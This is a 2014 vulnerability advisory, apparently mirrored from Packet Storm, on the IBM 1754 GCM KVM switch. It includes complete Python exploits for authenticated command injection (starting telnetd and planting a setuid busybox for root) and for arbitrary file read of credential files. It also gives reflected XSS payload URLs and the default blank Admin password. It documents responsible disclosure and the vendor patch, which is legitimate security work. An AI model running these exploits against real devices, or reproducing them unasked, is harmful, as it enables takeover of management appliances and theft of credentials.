Lucene search
K

IBM 1754 GCM KVM Code Execution / File Read / XSS

🗓️ 21 Jul 2014 00:00:00Reported by Alejandro Alvarez BravoType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 42 Views

IBM 1754 GCM KVM Code Execution, File Read, XSS vulnerabilities in versions v1.20.0.22575 and prior. Also present in rebranded DELL KVM

Related
Code
` *Product description*  
The IBM 1754 GCM family provides KVM over IP and serial console management  
technology in a single appliance. Versions v1.20.0.22575 and prior are  
vulnerables.  
Note that this vulnerability is also present in some DELL and probably  
other vendors of this rebranded KVM. I contacted Dell but no response has  
been received.  
  
*1. Remote code execution *  
CVEID: CVE-2014-2085  
Description: Improperly sanitized input may allow a remote authenticated  
attacker to perform remote code execution on the GCM KVM switch.  
PoC of this vulnerability:  
  
#!/usr/bin/python"""  
Exploit for Avocent KVM switch v1.20.0.22575.  
Remote code execution with privilege elevation.  
SessionId (avctSessionId) is neccesary for this to work, so you need a  
valid user. Default user is "Admin" with blank password.  
After running exploit, connect using telnet to device with user target  
(pass: target) then do "/tmp/su -" to gain root (password "root")  
[email protected]  
"""  
  
from StringIO import StringIO  
import pycurl  
import os  
  
sessid = "1111111111"  
target = "192.168.0.10"  
  
durl = "https://" + target + "/systest.php?lpres=;%20/usr/  
sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod%  
206755%20/tmp/su%20;"  
  
storage = StringIO()  
c = pycurl.Curl()  
c.setopt(c.URL, durl)  
c.setopt(c.SSL_VERIFYPEER,0)  
c.setopt(c.SSL_VERIFYHOST,0)  
c.setopt(c.WRITEFUNCTION,storage.write)  
c.setopt(c.COOKIE,'avctSessionId=' + sessid)  
  
try:  
print "[*] Sending GET to " + target + " with session id " + sessid  
+ "..."  
c.perform()  
c.close()  
except:  
print ""  
finally:  
print "[*] Done"  
print "[*] Trying telnet..."  
print "[*] Login as target/target, then do /tmp/su - and enter password  
\"root\""  
os.system("telnet " + target)  
  
*2. Arbitrary file read *  
CVEID: CVE-2014-3081  
Description: This device allows any authenticated user to read arbitrary  
files. Files can be anywhere on the target.  
  
PoC of this vulnerability:  
  
#!/usr/bin/python  
"""  
This exploit for Avocent KVM switch v1.20.0.22575 allows an attacker to  
read arbitrary files on device.  
SessionId (avctSessionId) is neccesary for this to work, so you need a  
valid user.  
[email protected]  
"""  
  
from StringIO import StringIO  
import pycurl  
  
sessid = "1111111111"  
target = "192.168.0.10"  
file = "/etc/IBM_user.dat"  
  
durl = "https://" + target + "/prodtest.php?engage=video_  
bits&display=results&filename=" + file  
  
storage = StringIO()  
c = pycurl.Curl()  
c.setopt(c.URL, durl)  
c.setopt(c.SSL_VERIFYPEER,0)  
c.setopt(c.SSL_VERIFYHOST,0)  
c.setopt(c.WRITEFUNCTION,storage.write)  
c.setopt(c.COOKIE,'avctSessionId=' + sessid)  
  
try:  
c.perform()  
c.close()  
except:  
print ""  
  
content = storage.getvalue()  
print content.replace("<td>","").replace("</td>","")  
  
*3. Cross site scripting non-persistent*  
CVEID: CVE-2014-3080  
Description: System is vulnerable to cross-site scripting, caused by  
improper validation of user-supplied input. A remote attacker could exploit  
this vulnerability using a specially-crafted URL to execute script in a  
victim's Web browser within the security context of the hosting Web site,  
once the URL is clicked. An attacker could use this vulnerability to steal  
the victim's cookie-based authentication credentials.  
  
Examples:  
http://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E  
https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E  
  
*Vendor Response:*  
IBM release 1.20.20.23447 firmware  
  
*Timeline:*  
2014-05-20 - Vendor (PSIRT) notified  
2014-05-21 - Vendor assigns internal ID  
2014-07-16 - Patch Disclosed  
2014-07-17 - Vulnerability disclosed  
  
*External Information:*  
Info about the vulnerability (spanish):  
http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html  
IBM Security Bulletin:  
http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983  
  
--   
--  
Alejandro Alvarez Bravo  
[email protected]  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Jul 2014 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.04132
42